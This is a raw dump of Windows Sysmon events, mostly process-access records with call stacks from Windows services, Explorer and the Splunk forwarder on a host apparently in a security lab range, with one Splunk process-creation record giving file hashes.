10341000x800000000000000011247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.954{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000011243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.859{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.797{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.797{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immer
siveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.766{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.766{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.766{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.766{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 